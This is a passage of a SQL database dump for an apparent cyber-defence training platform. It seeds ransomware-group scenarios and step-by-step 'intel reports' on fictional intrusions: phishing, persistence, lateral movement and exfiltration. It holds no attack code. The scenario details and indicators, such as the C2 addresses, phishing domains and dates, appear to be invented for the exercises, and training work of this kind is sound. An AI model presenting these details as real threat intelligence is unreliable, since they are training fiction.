(185, 'Advanced Threat Response: ALPHV\'s Rust-Based Ransomware Unveiled', ' ALPHV (BlackCat)', 'Master the intricacies of ALPHV\'s Rust ransomware with a deep dive into its encryptor and data leak innovations.', 'In an era where cyber threats evolve at a rapid pace, ALPHV (BlackCat) has emerged as a formidable adversary, leveraging Rust-based ransomware to orchestrate sophisticated attacks. Participants will embark on an expert-level training operation to dissect ALPHV\'s tactics, techniques, and procedures. They will explore a real-world scenario that challenges them to unravel the complexities of a highly customizable encryptor and innovative data leak site, pushing the boundaries of their cyber defense skills.', 'expert', 0, 1, 1, 60, NULL, '[\"APTs\",\"Rust ransomware\",\"cybersecurity training\",\"ALPHV\",\"data leak\"]', NULL, 5, '2026-03-15 19:12:45', 'Advanced Threat Response: ALPHV\'s Rust-Based Ransomware Unveiled', 'Master the intricacies of ALPHV\'s Rust ransomware with a deep dive into its encryptor and data leak innovations.', 'operation-alphv-blackcat', 1),
(186, 'LockBit Ransomware: Unveiling the Affiliate Program and Public Persona', 'LockBit', 'Explore LockBit\'s notorious ransomware operations and analyze their affiliate program and public strategies.', 'In this training scenario, participants will delve into the operations of LockBit, a notorious ransomware group. Known for their audacious tactics and a sophisticated affiliate program, LockBit has become a formidable adversary in the cybersecurity landscape. Trainees will investigate the group\'s bug bounty offerings for vulnerabilities and their bold public persona, providing a comprehensive understanding of their modus operandi.', 'beginner', 0, 1, 1, 60, NULL, '[\"LockBit\",\"ransomware\",\"cybersecurity training\",\"affiliate program\",\"bug bounty\"]', NULL, 5, '2026-03-15 19:14:23', 'LockBit Ransomware: Unveiling the Affiliate Program and Public Persona', 'Explore LockBit\'s notorious ransomware operations and analyze their affiliate program and public strategies.', 'operation-lockbit-empire', 1),
(187, 'Advanced Ransomware Investigation: Akira\'s Tactics and Techniques', 'Akira', 'Analyze Akira\'s ransomware operations: retro leak site, Cisco VPN targeting, and VMware ESXi attacks.', 'Welcome to an advanced cybersecurity operation scenario where you\'ll dive deep into the malicious world of Akira, a sophisticated APT group. Your mission is to investigate their potential links with Conti, unravel their retro-styled leak site, and understand their strategic targeting of Cisco VPN and VMware ESXi systems. In this scenario, you\'ll follow a trail of five key alerts that will test your skills in identifying and neutralizing threats as you unfold a complex narrative of cyber espionage.', 'advanced', 0, 1, 1, 60, NULL, '[\"Akira ransomware\",\"Conti links\",\"Cisco VPN attacks\",\"VMware ESXi\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:14:47', 'Advanced Ransomware Investigation: Akira\'s Tactics and Techniques', 'Analyze Akira\'s ransomware operations: retro leak site, Cisco VPN targeting, and VMware ESXi attacks.', 'operation-akira', 1),
(188, 'NoEscape Ransomware: Healthcare Sector Intrusion Analysis', 'NoEscape (Avaddon reboot)', 'Investigate NoEscape\'s ransomware operation evolution targeting healthcare systems.', 'In an era of increasing cyber threats, the healthcare sector faces a sophisticated adversary: NoEscape, an evolved form of the notorious Avaddon ransomware. As an expert analyst, you are tasked with dissecting their ransomware-as-a-service operation. Your mission is to track how this APT group has refined its tactics, techniques, and procedures to infiltrate and exploit vulnerable healthcare networks. Brace yourself for a deep dive into a complex world of cyber espionage and critical data compromises.', 'expert', 0, 1, 1, 60, NULL, '[\"ransomware\",\"healthcare cybersecurity\",\"APT analysis\",\"NoEscape\",\"cyber threat intelligence\"]', NULL, 5, '2026-03-15 19:15:04', 'NoEscape Ransomware: Healthcare Sector Intrusion Analysis', 'Investigate NoEscape\'s ransomware operation evolution targeting healthcare systems.', 'operation-noescape', 1),
(189, 'Ragnar Locker\'s VM Evasion: Gaming Industry Under Siege', ' Ragnar Locker', 'Investigate Ragnar Locker\'s ransomware tactics using virtual machines to target the gaming industry.', 'In the world of cybercrime, Ragnar Locker has set its sights on the lucrative gaming industry. Their unique tactic of deploying ransomware within virtual machines to evade detection poses a novel challenge for cybersecurity defenders. As a novice analyst, you are tasked with unraveling this complex operation and protecting valuable gaming assets.', 'novice', 0, 1, 1, 60, NULL, '[\"Ragnar Locker\",\"ransomware\",\"virtual machine\",\"gaming industry\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:15:22', 'Ragnar Locker\'s VM Evasion: Gaming Industry Under Siege', 'Investigate Ragnar Locker\'s ransomware tactics using virtual machines to target the gaming industry.', 'operation-ragnar-locker', 1),
(190, 'Analyzing Mount Locker Ransomware: Corporate Negotiations & Builder Insights', 'Mount Locker (AstroLocker)', 'Dive into Mount Locker ransomware operations with a focus on negotiations and builder analysis.', 'In the world of cyber threats, Mount Locker, also known as AstroLocker, has made waves with its sophisticated ransomware operations. Your task is to delve into their methods, focusing on corporate-style negotiations and the intricacies of their builder and affiliate program. This investigation will unravel the complexities of how they gain initial access, execute their payloads, and maintain persistence. Can you piece together the clues and understand their modus operandi?', 'beginner', 0, 1, 1, 60, NULL, '[\"Mount Locker ransomware\",\"cybersecurity training\",\"APT analysis\",\"ransomware negotiation\",\"cyber threat intelligence\"]', NULL, 4, '2026-03-15 19:15:43', 'Analyzing Mount Locker Ransomware: Corporate Negotiations & Builder Insights', 'Dive into Mount Locker ransomware operations with a focus on negotiations and builder analysis.', 'operation-mount-locker', 1),
(191, 'Maze Ransomware: Double Extortion and Collaborative Threats', 'Maze', 'Investigate Maze\'s double extortion tactics and their collaboration with other ransomware groups.', 'In recent times, the Maze ransomware group has emerged as a formidable threat actor, known for pioneering the \'double extortion\' technique. This training scenario immerses participants in a complex investigation of Maze\'s tactics, including their notorious data leak site innovation and strategic alliances with other ransomware groups. As cyber defenders, you will navigate a series of alerts that unravel Maze\'s sophisticated attack chain.', 'intermediate', 0, 1, 1, 60, NULL, '[\"Maze ransomware\",\"double extortion\",\"data leak site\",\"cybersecurity training\",\"APT group\"]', NULL, 5, '2026-03-15 19:16:01', 'Maze Ransomware: Double Extortion and Collaborative Threats', 'Investigate Maze\'s double extortion tactics and their collaboration with other ransomware groups.', 'operation-maze-cartel', 1),
(192, 'Egregor Ransomware: Unraveling its Maze Lineage and Retail Impact', 'Egregor', 'Dive deep into Egregor\'s ransomware tactics, retail sector assaults, and the law enforcement crackdown.', 'In a world where digital threats lurk around every corner, the Egregor ransomware group emerged as a formidable adversary. Emerging from the shadows of the notorious Maze group, Egregor quickly made a name for itself by targeting the retail sector with swift and devastating attacks. As law enforcement agencies rallied to dismantle this cybercrime syndicate, a gripping tale of cat-and-mouse unfolded. This advanced training scenario will immerse you in the investigation of Egregor\'s short-lived yet impactful operation, exploring the intricate web of their tactics, techniques, and procedures (TTPs).', 'advanced', 0, 1, 1, 60, NULL, '[\"Egregor ransomware\",\"Maze group\",\"cyber threat intelligence\",\"law enforcement takedown\",\"retail cybersecurity\"]', NULL, 5, '2026-03-15 19:16:19', 'Egregor Ransomware: Unraveling its Maze Lineage and Retail Impact', 'Dive deep into Egregor\'s ransomware tactics, retail sector assaults, and the law enforcement crackdown.', 'operation-egregor', 1),
(193, 'Advanced Fileless Ransomware Investigation: NetWalker in Healthcare & Education', 'NetWalker (Mailto)', 'Engage in an advanced analysis of NetWalker\'s fileless ransomware tactics targeting healthcare and education sectors.', 'In this advanced training scenario, participants will delve into the sophisticated world of NetWalker, a notorious APT group known for its ransomware-as-a-service model. This operation focuses on their recent campaigns targeting vulnerable healthcare and education institutions. Trainees will investigate the PowerShell-based fileless execution techniques used by NetWalker affiliates to infiltrate and disrupt critical operations. As the scenario unfolds, participants must navigate through a series of alerts, each revealing a piece of the puzzle that ultimately leads to a comprehensive understanding of NetWalker’s attack strategies.', 'advanced', 0, 1, 1, 60, NULL, '[\"NetWalker\",\"ransomware investigation\",\"fileless execution\",\"healthcare cybersecurity\",\"educational institutions security\"]', NULL, 5, '2026-03-15 19:16:48', 'Advanced Fileless Ransomware Investigation: NetWalker in Healthcare & Education', 'Engage in an advanced analysis of NetWalker\'s fileless ransomware tactics targeting healthcare and education sectors.', 'operation-netwalker', 1);
--
-- Seed rows for `operations` (continued): the DoppelPaymer scenario (id 194)
-- and the Capcom / Ragnar Locker scenario (id 195). Column order follows the
-- column list below; `tags` holds a JSON array literal, and `time_limit_hours`
-- and `scenario_prompt` are left NULL for both seeded rows.
--
INSERT INTO `operations`
  (`id`, `title`, `apt_group`, `description`, `story_intro`,
   `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`,
   `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`,
   `seo_title`, `seo_description`, `slug`, `min_level`)
VALUES
  -- 194: expert difficulty, 6 alerts, premium (is_premium = 1)
  (194,
   'DoppelPaymer Ransomware: Critical Infrastructure Under Siege',
   'DoppelPaymer (Grief)',
   'Investigate DoppelPaymer\'s ransomware attacks on infrastructure, analyzing BitPaymer\'s evolution and the NRA incident.',
   'In the heart of a bustling city, a sudden ransomware attack cripples essential services, leaving citizens in chaos. DoppelPaymer, an infamous APT group, has evolved its tactics, leveraging its BitPaymer variant to target municipalities and critical infrastructures. As the senior analyst, your mission is to dissect their attack strategy, focusing on the notorious NRA incident, and devise a defense plan to thwart their advances.',
   'expert', 0, 1, 1, 60,
   NULL,
   '[\"DoppelPaymer ransomware\",\"BitPaymer evolution\",\"cyber attack analysis\",\"APT threats\",\"critical infrastructure security\"]',
   NULL, 6, '2026-03-15 19:17:12',
   'DoppelPaymer Ransomware: Critical Infrastructure Under Siege',
   'Investigate DoppelPaymer\'s ransomware attacks on infrastructure, analyzing BitPaymer\'s evolution and the NRA incident.',
   'operation-doppelpaymer', 1),
  -- 195: novice difficulty, 4 alerts, free (is_premium = 0).
  -- NOTE(review): slug 'operation-ragnarlocker' differs from id 189's
  -- 'operation-ragnar-locker' only by a hyphen -- confirm both are intended.
  (195,
   'Ragnar Locker Ransomware Attack Simulation on Capcom',
   'Ragnar Locker',
   'Investigate Ragnar Locker\'s ransomware attack on Capcom, revealing 1TB of game data and an $11M ransom demand.',
   'In November 2020, Capcom, a prominent video game developer, faced a catastrophic ransomware attack by the notorious Ragnar Locker APT group. The hackers successfully infiltrated Capcom\'s network, exfiltrating 1TB of sensitive data, including unreleased game information, and demanded an $11 million ransom. This scenario immerses trainees in the investigation, challenging them to uncover how the attackers gained access, moved laterally, and executed their malicious plan.',
   'novice', 0, 1, 0, 60,
   NULL,
   '[\"Ragnar Locker\",\"ransomware attack\",\"Capcom data breach\",\"cybersecurity training\",\"APT group tactics\"]',
   NULL, 4, '2026-03-15 19:17:39',
   'Ragnar Locker Ransomware Attack Simulation on Capcom',
   'Investigate Ragnar Locker\'s ransomware attack on Capcom, revealing 1TB of game data and an $11M ransom demand.',
   'operation-ragnarlocker', 1);

-- --------------------------------------------------------

--
-- Table structure for table `operation_alerts`
--

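--
-- `operation_alerts` links a training operation to the ordered list of alerts
-- that make up its storyline, with an optional Markdown "intel report" shown
-- for that step. One row per (operation, alert) pair.
--
-- Review notes on this definition:
--   * ENGINE changed MyISAM -> InnoDB. This dump is wrapped in
--     START TRANSACTION / COMMIT, which MyISAM does not honour: a failed
--     import would leave this table half-populated and out of step with
--     `operations` and `alerts`. MyISAM also cannot enforce FOREIGN KEY
--     constraints, so the two references below could never be protected.
--   * CHARSET changed latin1 -> utf8mb4 to match the rest of the dump
--     (SET NAMES utf8mb4 in the header; `alerts` already stores its long
--     text as utf8mb4). A latin1 column cannot hold anything outside the
--     cp1252 repertoire, and with SQL_MODE reduced to NO_AUTO_VALUE_ON_ZERO
--     at the top of this dump that loss would surface only as a warning.
--   * PRIMARY KEY / AUTO_INCREMENT are deliberately not declared here: this
--     dump defers keys to a later "Indexes for dumped tables" section (the
--     `alerts` definition above has none either), and a second definition
--     would fail the import.
--   * TODO(review): once the primary keys exist, add
--       FOREIGN KEY (operation_id) REFERENCES operations(id),
--       FOREIGN KEY (alert_id)     REFERENCES alerts(id),
--     and UNIQUE (operation_id, sequence_order) so a storyline cannot have
--     two steps at the same position.
--
CREATE TABLE `operation_alerts` (
  `id` int(11) NOT NULL,                            -- surrogate key; AUTO_INCREMENT is expected to be added later in the dump
  `operation_id` int(11) NOT NULL,                  -- presumably operations.id (see FK note above)
  `alert_id` int(11) NOT NULL,                      -- presumably alerts.id
  `sequence_order` int(11) NOT NULL,                -- position of this alert within the operation; seed data starts at 1
  `intel_report_title` varchar(255) DEFAULT NULL,   -- NULL when the step has no intel report
  `intel_report_content` text DEFAULT NULL,         -- Markdown. NOTE(review): presumably rendered in the UI -- make sure raw HTML is escaped
  `created_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;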

--
-- Dumping data for table `operation_alerts`
--

INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(1, 1, 268, 1, 'Investigative Report: Phishing Email Analysis', '### Overview\nThe initial alert in Operation Dark Current has detected a phishing email targeting employees at the power facility. The email contained a malicious attachment disguised as a routine internal document.\n\n### Findings\n- **Sender:** The email originated from a compromised external account known for past association with the Sandworm APT group.\n- **Attachment:** An Excel file with embedded macros designed to execute upon opening.\n- **Targets:** Key personnel within the corporate IT network.\n\n### Next Steps\nThis incident indicates the potential for malware deployment. Increased scrutiny on email attachments and network traffic is advised as the next phase of the attack may involve malware execution.', '2025-12-31 13:10:04'),
(2, 1, 269, 2, 'Malware Analysis: BlackEnergy Deployment', '### Overview\nFollowing the phishing incident, BlackEnergy malware has been executed within the corporate IT network. Analysis of this malware is crucial to understanding the attack vector and preventing further incidents.\n\n### Findings\n- **Functionality:** BlackEnergy is a versatile malware capable of launching DDoS attacks, stealing credentials, and deploying additional payloads.\n- **Indicators of Compromise:** Network traffic to known malicious IPs and unusual process creation on infected systems.\n\n### Next Steps\nDetection of persistence mechanisms is critical. Efforts should be focused on identifying registry changes or scheduled tasks that suggest the establishment of persistence within the network.', '2025-12-31 13:10:04'),
(3, 1, 270, 3, 'Persistence Mechanism Identified', '### Overview\nInvestigation reveals that the attackers have established persistence within the corporate IT environment, allowing them to maintain access even after system reboots.\n\n### Findings\n- **Techniques Used:** Modification of startup scripts and registry keys; scheduled tasks pointing to malicious scripts.\n- **Affected Systems:** Several key servers and workstations exhibit signs of compromise.\n\n### Next Steps\nAttention should now shift towards detecting and preventing lateral movement towards the Operational Technology (OT) network, as this is a likely next step for the attackers.', '2025-12-31 13:10:04'),
(4, 1, 271, 4, 'Lateral Movement Detected: OT Network Breach', '### Overview\nThe attackers have successfully moved laterally from the corporate IT network into the OT network, a critical phase in compromising the power grid\'s infrastructure.\n\n### Findings\n- **Methods:** Use of stolen credentials and exploitation of trusted connections between IT and OT networks.\n- **Compromised Components:** Initial access to the OT network has been confirmed on systems managing SCADA operations.\n\n### Next Steps\nImmediate action is required to contain and mitigate any potential SCADA system compromise. Focus should be on isolating affected systems and monitoring for execution attempts within the SCADA environment.', '2025-12-31 13:10:04'),
(5, 1, 272, 5, NULL, NULL, '2025-12-31 13:10:04'),
(6, 2, 274, 1, NULL, NULL, '2025-12-31 13:43:07'),
(7, 2, 275, 2, 'Analysis of Malicious Code Execution on Developer Systems', '# Malicious Code Execution on Developer Systems\n\n## Context\nFollowing the phishing attempts through weaponized job offers, the adversary has successfully executed malicious code on the targeted developer systems. This report analyzes the initial compromise and provides insights into the malware tactics used.\n\n## Key Findings\n- **Delivery Method**: The phishing emails contained attachments disguised as job descriptions, which, once opened, executed a macro to download a secondary payload.\n- **Payload Details**: The malware used is a variant of the Lazarus Group’s known toolkit, designed to evade traditional antivirus solutions and persist within compromised systems.\n- **Immediate Impact**: Initial indicators suggest that the malware is harvesting credentials and establishing communication with command-and-control (C2) servers.\n\n## Recommendations\n- **Immediate Actions**: Isolate affected systems and perform a full forensic analysis to identify all compromised endpoints.\n- **Preventive Measures**: Conduct security awareness training focusing on phishing detection and enforce strict email attachment policies.', '2025-12-31 13:43:07'),
(8, 2, 276, 3, 'Establishing Persistence and Lateral Movement within the Network', '# Establishing Persistence and Lateral Movement\n\n## Context\nPost-malicious code execution, the adversary is moving laterally within the network, aiming to establish persistence across multiple systems. This report delves into the techniques used by the Lazarus Group for lateral movement and persistence.\n\n## Key Findings\n- **Techniques Used**: The attackers are leveraging compromised credentials and exploiting existing vulnerabilities to move laterally within the organization’s network.\n- **Persistence Mechanisms**: The group is using scheduled tasks and registry modifications to maintain access to compromised systems.\n- **Targeted Assets**: Key systems identified include cryptocurrency wallets and financial transaction servers.\n\n## Recommendations\n- **Network Segmentation**: Strengthen network segmentation to limit lateral movement.\n- **Monitoring and Detection**: Implement enhanced monitoring for unusual login activities and unauthorized access attempts.', '2025-12-31 13:43:07'),
(9, 2, 277, 4, 'Cryptocurrency Exfiltration Tactics and Laundering Channels', '# Cryptocurrency Exfiltration and Laundering\n\n## Context\nWith persistence established, the Lazarus Group is actively exfiltrating cryptocurrency assets, utilizing complex laundering channels to obfuscate the funds\' origins. This report provides insights into the exfiltration processes and laundering mechanisms employed.\n\n## Key Findings\n- **Exfiltration Process**: The attackers are using custom scripts to automate the transfer of cryptocurrency from compromised wallets to intermediary accounts.\n- **Laundering Channels**: Funds are being funneled through a series of mixer services and exchanged across multiple cryptocurrency platforms to obscure the trail.\n- **Evasion Tactics**: The group employs rapid transfer sequences and leverages decentralized exchanges to minimize traceability.\n\n## Recommendations\n- **Transaction Monitoring**: Enhance transaction monitoring to identify unusual patterns and large transfers out of normal business hours.\n- **Collaboration with Exchanges**: Work closely with cryptocurrency exchanges and financial institutions to flag and freeze suspicious transactions.', '2025-12-31 13:43:07'),
(10, 3, 278, 1, 'Analysis of Malicious Code Execution', '### Background\nFollowing the detection of a compromised update package, forensic analysis has confirmed the execution of malicious code on affected systems. This report delves into the mechanisms employed by APT41 to activate their payload upon deployment of the infected update.\n\n### Key Findings\n- **Initial Execution**: The malicious DLL is designed to execute upon the initialization of the server management software.\n- **Obfuscation Techniques**: APT41 has employed advanced obfuscation techniques to avoid detection by traditional antivirus software.\n- **Payload Functionality**: The primary functions include system reconnaissance and the establishment of backdoor access for further exploitation.\n\n### Next Steps\nMitigation should focus on the identification and isolation of compromised hosts. Enhanced monitoring for unusual system activity is recommended to detect further malicious behavior.', '2025-12-31 13:45:44'),
(11, 3, 279, 2, 'Persistence Mechanisms and Countermeasures', '### Overview\nAPT41 has been observed establishing persistence on compromised systems following the execution of their payload. This report outlines the persistence techniques used and suggests countermeasures to neutralize this threat.\n\n### Persistence Techniques\n- **Registry Modifications**: Alterations to the Windows Registry to ensure the malware runs on system startup.\n- **Scheduled Tasks**: Creation of scheduled tasks to execute malware at specified intervals.\n\n### Recommended Countermeasures\n- **Registry Auditing**: Regular audits of the registry for unauthorized changes.\n- **Task Scheduler Monitoring**: Implement alerts for the creation of new scheduled tasks.\n\n### Conclusion\nNeutralizing persistence is critical to prevent further exploitation and lateral movement within the network.', '2025-12-31 13:45:44'),
(12, 3, 280, 3, 'Lateral Movement and Data Exfiltration Insights', '### Incident Summary\nPost-establishment of persistence, APT41 has initiated lateral movement to expand its foothold within the network and commenced data exfiltration activities. This report provides insights into these operations and their implications.\n\n### Lateral Movement Tactics\n- **Credential Dumping**: Use of tools to extract login credentials from compromised systems.\n- **Remote Services**: Exploitation of remote desktop and SMB services for network traversal.\n\n### Data Exfiltration\n- **Command and Control (C2) Channels**: Data is being exfiltrated using encrypted C2 channels to evade detection.\n- **Volume and Target Data**: Focus on intellectual property and financial records.\n\n### Recommendations\n- **Network Segmentation**: Implement stringent network segmentation to contain the spread.\n- **Data Loss Prevention (DLP)**: Deploy DLP solutions to monitor and block unauthorized data transfers.\n\n### Conclusion\nProactive measures are essential to detect and thwart further lateral movement and data theft by the adversary.', '2025-12-31 13:45:44'),
(13, 3, 281, 4, NULL, NULL, '2025-12-31 13:45:44'),
(14, 4, 285, 1, 'Analysis of Malicious Domain Infrastructure', '### Overview\nFollowing the detection of a spear-phishing email campaign targeting political organizations, further analysis has led to the identification of a network of malicious domains. These domains are linked to APT28\'s credential harvesting activities.\n\n### Findings\n- **Domain Patterns:** The domains employ similar naming conventions, often mimicking legitimate services to deceive targets.\n- **Hosting and IP Details:** The infrastructure is hosted across several countries, complicating attribution and takedown efforts.\n- **SSL/TLS Certificates:** Many domains utilize Let\'s Encrypt certificates, providing a false sense of security.\n\n### Recommendations\n- **Monitoring and Blocking:** Implement domain monitoring for known malicious patterns and block identified domains at the network level.\n- **User Education:** Enhance awareness training focused on recognizing phishing attempts related to these domains.', '2025-12-31 15:17:10'),
(15, 4, 286, 2, 'Investigation into OAuth Token Abuse', '### Overview\nSubsequent to the discovery of malicious domains, evidence of OAuth token abuse has been detected. This technique is being used to maintain persistent access to compromised accounts within targeted organizations.\n\n### Findings\n- **Scope of Abuse:** Multiple accounts within political organizations have been accessed using OAuth tokens, bypassing traditional authentication.\n- **Attack Vectors:** Tokens are likely being obtained through previously identified spear-phishing campaigns.\n- **Impact:** Abused tokens allow threat actors to conduct operations with legitimate access, making detection difficult.\n\n### Recommendations\n- **Token Revocation:** Immediate revocation of suspicious OAuth tokens is critical.\n- **Enhanced Monitoring:** Deploy advanced monitoring to detect anomalous token usage patterns.\n- **User Awareness:** Educate users on the risks of OAuth token misuse and encourage cautious application authorization.', '2025-12-31 15:17:10'),
(16, 4, 287, 3, 'Disinformation Campaign Planning Insights', '### Overview\nIntelligence has surfaced regarding the planning of a disinformation campaign by APT28, aimed at influencing public perception during the national election period.\n\n### Findings\n- **Tactics and Channels:** The campaign plans to utilize social media platforms and fake news websites to disseminate false narratives.\n- **Target Audience:** Efforts are focused on swaying undecided voters and amplifying societal divisions.\n- **Coordination:** Activities appear to be coordinated with other malicious operations, potentially leveraging stolen credentials and OAuth access.\n\n### Recommendations\n- **Collaboration:** Work with social media companies to identify and remove fake accounts and content.\n- **Public Awareness:** Launch public awareness initiatives to educate voters on identifying disinformation.\n- **Intel Sharing:** Foster information sharing among national and international partners to enhance detection and response efforts.', '2025-12-31 15:17:10'),
(17, 4, 288, 4, NULL, NULL, '2025-12-31 15:17:10'),
(18, 5, 289, 1, 'Analysis of Phishing Email Attack Vector', '### Overview\nThe phishing email was identified as the initial attack vector used by the Wizard Spider APT group. The email, disguised as an urgent communication from a trusted medical supplier, contained a malicious link to a counterfeit login page.\n\n### Technical Details\n- **Sender Email Address**: spoofed@trustedmedical.com\n- **Subject Line**: \'Immediate Action Required: Update Your Credentials\'\n- **Date/Time Detected**: 2023-10-15 09:45 UTC\n- **Malicious URL**: hxxp://update-credentials[.]secure-med[.]com\n\n### Next Steps\nThe detection of this phishing email suggests the potential for further malicious activity. Vigilance is advised for indicators of TrickBot malware, commonly used by Wizard Spider after initial entry.', '2025-12-31 15:22:50'),
(19, 5, 290, 2, 'TrickBot Malware Execution Analysis', '### Overview\nTrickBot malware was executed following the successful phishing attack, marking the transition from initial access to establishing a foothold within the hospital network.\n\n### Technical Details\n- **Malware Type**: TrickBot variant\n- **Execution Path**: C:\\\\Users\\\\Public\\\\updater.exe\n- **Date/Time Detected**: 2023-10-15 10:15 UTC\n- **Command and Control (C2) Server**: 192.168.1.100\n\n### Persistence Mechanisms\nThe malware is known to deploy persistence mechanisms to maintain access. Monitoring for scheduled tasks or registry changes is crucial as we anticipate these activities to follow.', '2025-12-31 15:22:50'),
(20, 5, 291, 3, 'Persistence Mechanism Identification', '### Overview\nPersistence mechanisms were identified, confirming the adversary\'s intent to maintain long-term access to the hospital\'s network.\n\n### Technical Details\n- **Registry Key Modification**: HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\n- **Scheduled Task Created**: \'SystemUpdater\' running updater.exe\n- **Date/Time Detected**: 2023-10-15 11:00 UTC\n\n### Indicator of Lateral Movement\nThe presence of persistence mechanisms suggests the next likely phase is lateral movement. Cobalt Strike, a common tool for such activities, should be anticipated.', '2025-12-31 15:22:50'),
(21, 5, 292, 4, 'Cobalt Strike Beacon Detection', '### Overview\nA Cobalt Strike beacon was detected, indicating the adversary\'s progression to lateral movement within the network.\n\n### Technical Details\n- **Beacon IP Address**: 192.168.1.101\n- **Beacon Port**: 4444\n- **Date/Time Detected**: 2023-10-15 11:45 UTC\n- **Communication Method**: HTTPS\n\n### Implications\nThis activity signifies an imminent threat of ransomware deployment. Immediate action is required to isolate affected systems and prevent the final stage of ransomware encryption.', '2025-12-31 15:22:50'),
(22, 5, 293, 5, NULL, NULL, '2025-12-31 15:22:50'),
(23, 6, 294, 1, 'Report: Analysis of Initial Access via Spear Phishing Campaign', '### Overview\nThe spear phishing campaign executed by the Carbanak/FIN7 group was highly targeted, focusing on banking personnel with access to critical systems. The phishing emails were crafted to appear as legitimate internal communications, increasing the probability of successful compromise.\n\n### Key Indicators\n- **Email Subject:** \'Urgent Security Update Required\'\n- **Sender Domain:** spoofed from `security-update@bankinginternal.com`\n- **Attachment:** Malicious XLS file named `Security_Update.xls`\n\n### Next Steps\nThe next phase involves deploying malware to harvest credentials. It is critical to monitor for anomalies in user behavior and system access patterns to mitigate further compromise.', '2025-12-31 15:23:56'),
(24, 6, 295, 2, 'Report: Malware Execution and Credential Harvesting Analysis', '### Overview\nFollowing the initial spear phishing attack, the Carbanak/FIN7 group deployed a sophisticated malware payload. This malware is designed to execute stealthily and harvest credentials from compromised systems.\n\n### Malware Characteristics\n- **Type:** Remote Access Trojan (RAT)\n- **Capabilities:** Keylogging, screen capture, credential dumping\n- **Persistence Mechanism:** Scheduled Tasks and Registry modifications\n\n### Next Steps\nAttention should be directed towards detecting and isolating instances of lateral movement within the network. Implement robust network segmentation and monitor for unauthorized access attempts to critical systems.', '2025-12-31 15:23:56'),
(25, 6, 296, 3, 'Report: Lateral Movement and Network Exploitation Techniques', '### Overview\nCarbanak/FIN7 have initiated lateral movement across the network, leveraging harvested credentials to escalate privileges and access sensitive systems.\n\n### Techniques Observed\n- **Credential Reuse:** Exploiting weak password policies\n- **Pass-the-Hash:** Utilizing NTLM hashes to authenticate\n- **Exploitation of Vulnerable Services:** Targeting unpatched systems for entry\n\n### Next Steps\nThe final stage involves manipulation of ATM withdrawal limits and exploitation of SWIFT gateways. Enhance monitoring of financial transaction systems and initiate real-time alerts for unusual transaction patterns.', '2025-12-31 15:23:56'),
(26, 6, 297, 4, NULL, NULL, '2025-12-31 15:23:56'),
(27, 7, 304, 1, 'Analysis of Spear Phishing Email Detected', '## Overview\nThe initial spear phishing email was detected targeting key personnel within the IT department of the multinational energy corporation. The email contained a malicious attachment disguised as a financial report.\n\n## Details\n- **Sender**: An email address mimicking a known supplier.\n- **Subject Line**: \'Urgent: Q3 Financial Summary Required\'\n- **Attachment**: A macro-enabled Excel file designed to execute a PowerShell script upon opening.\n\n## Next Steps\nMonitoring for any execution of scripts related to this email is crucial to prevent further compromise. Pay special attention to any PowerShell activities that may be triggered as a result of this email.', '2026-01-02 04:27:59'),
(28, 7, 305, 2, 'Investigation into Suspicious PowerShell Execution', '## Overview\nFollowing the detection of the spear phishing email, a suspicious PowerShell script execution was identified on the workstation of a targeted employee.\n\n## Details\n- **Script Purpose**: The PowerShell script was designed to establish a remote connection with command-and-control (C2) servers operated by APT34.\n- **Indicators**: Execution logs show obfuscation techniques to evade detection.\n\n## Insights\nThis execution suggests the attackers are attempting to gain a foothold within the network. Immediate measures should be taken to isolate the affected system and prevent the establishment of persistence mechanisms.', '2026-01-02 04:27:59'),
(29, 7, 306, 3, 'Identification of Persistence Mechanism Established', '## Overview\nAPT34 has successfully established a persistence mechanism within the compromised systems, leveraging scheduled tasks for recurring execution of malicious scripts.\n\n## Details\n- **Technique**: Creation of scheduled tasks to execute scripts at regular intervals.\n- **Tools Used**: Commonly used Windows utilities to create and modify tasks.\n\n## Strategic Implications\nThe persistence indicates a strategic intention to maintain long-term access. This necessitates a thorough review of scheduled tasks across all systems to pinpoint and neutralize unauthorized entries.', '2026-01-02 04:27:59'),
(30, 7, 307, 4, 'Detection of Unauthorized Lateral Movement', '## Overview\nAnomalous activity indicating unauthorized lateral movement within the corporate network was detected, suggesting the attackers are expanding their access.\n\n## Details\n- **Method**: Use of stolen credentials to access additional systems.\n- **Targets**: Systems containing sensitive geological data.\n\n## Recommendations\nStrengthen monitoring of privileged accounts and implement network segmentation to hinder further lateral movement. It\'s critical to review access logs to understand the attack path and prevent data exfiltration attempts.', '2026-01-02 04:27:59'),
(31, 7, 308, 5, NULL, NULL, '2026-01-02 04:27:59'),
(32, 8, 319, 1, 'Phishing Email Analysis', '### Overview\nThe initial alert identified a **suspicious email** likely associated with a phishing attempt. This is often the first step in APT10\'s strategy to deliver malicious payloads.\n\n### Detailed Analysis\n- **Sender\'s Email:** The email originated from a domain resembling a known vendor, indicating a possible **spear-phishing** attempt.\n- **Content:** The email contained a link to a compromised website designed to harvest credentials.\n- **Attachment:** A malicious document file was attached, likely containing a macro to execute malware upon opening.\n\n### Next Steps\n- **Containment:** Block the sender\'s domain and similar variants.\n- **Awareness:** Educate employees on identifying phishing attempts.\n- **Monitoring:** Increase surveillance on network activities for any unauthorized application executions, which could indicate successful malware deployment.', '2026-01-02 20:23:41'),
(33, 8, 320, 2, 'Malware Execution Insight', '### Overview\nFollowing the phishing incident, an alert was triggered for **unauthorized application execution**. This suggests that the malware embedded in the phishing email has been activated.\n\n### Detailed Analysis\n- **Execution Path:** The malware was executed from a temporary directory, consistent with initial payload delivery tactics.\n- **Detection:** Antivirus logs show the execution of a file named `loader.exe`, indicative of a dropper or loader.\n- **Behavior:** The malware attempts to establish a connection with a known C2 server used by APT10.\n\n### Next Steps\n- **Containment:** Isolate the affected system to prevent further spread.\n- **Forensics:** Capture memory and disk images for analysis.\n- **Monitoring:** Watch for attempts to establish persistence mechanisms, which could solidify the presence of the threat.', '2026-01-02 20:23:41'),
